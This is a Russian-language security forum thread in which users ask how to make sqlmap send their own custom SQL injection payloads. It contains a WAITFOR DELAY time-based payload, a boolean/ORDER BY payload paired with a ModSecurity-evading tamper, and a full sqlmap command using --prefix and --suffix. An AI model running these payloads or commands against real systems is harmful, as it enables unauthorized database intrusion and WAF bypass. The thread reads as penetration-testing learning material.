• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Как sqlmap заставить использовать мой payload

gergaz

Member
12.05.2019
14
0
BIT
0
Здравствуйте.
Как sqlmap заставить использовать мой payload.
Есть пайлоад, к примеру:
)))/**/WAITFOR/**/DELAY/**/'0:0:5'/**/AND/**/(((8226=8226
под него с помощью atlas подобрал tamper space2randomblank
как мне заставить sqlmap использовать именно этот пайлоад, а не перебирать свои?
 

f22

Codeby Academy
Gold Team
05.05.2019
1 842
225
BIT
1 055
Вот тут описаны все ключи запуска
Тебе должно пригодиться что-то из этого раздела
15_09-57_3.png
 

USE

New member
18.01.2020
2
0
BIT
0
Извините что вмешиваюсь!
Вопрос вот у меня такой:
Есть у меня сайт, к примеру: https://site.net/search.php/ и есть у меня пейлоад '////AND////1=1//////OR////9=10//////ORDERBY(1,2,3,4,5) , а также имееться тампер space2multicomment (ваф мод секьюрити ) как мне правильно поставить команду в мап? Где и куда поставить --sufix и --prefix ?
Извините может туплю , но из вики мапа я ничего не понял(
 

f22

Codeby Academy
Gold Team
05.05.2019
1 842
225
BIT
1 055
Да ничего страшного)
Попробуй так:
python sqlmap.py -p host -u "https://site.net/search.php?param=1" --prefix "'////" --suffix "AND////1=1//////OR////9=10//////ORDERBY(1,2,3,4,5)"
 

USE

New member
18.01.2020
2
0
BIT
0
Да ничего страшного)
Попробуй так:
python sqlmap.py -p host -u "https://site.net/search.php?param=1" --prefix "'////" --suffix "AND////1=1//////OR////9=10//////ORDERBY(1,2,3,4,5)"
Большое человечес он спасибо) теперь буду знать как правильно кормить Мапу пейлоады)
Жаль что лайк не могу поставить , наверное в данной ветке запрещено ставить лайки либо у меня прав нету ещё, новичков на данном форум, на любом форуме правила разные)
Ещё раз спасибо)
 

Сергей Попов

Кодебай
30.12.2015
4 695
6 592
BIT
387
наверное в данной ветке запрещено ставить лайки
В этом разделе особый тип like:
B левой части каждого сообщения, слева от аватарки, есть стрелки ⇧ и ⇩. Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет (сменить префикс "Проблема" на "Решено"), надо выбрать лучший ответ. Просто нажмите значок 🏆 в левой части сообщения, слева от аватарки.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!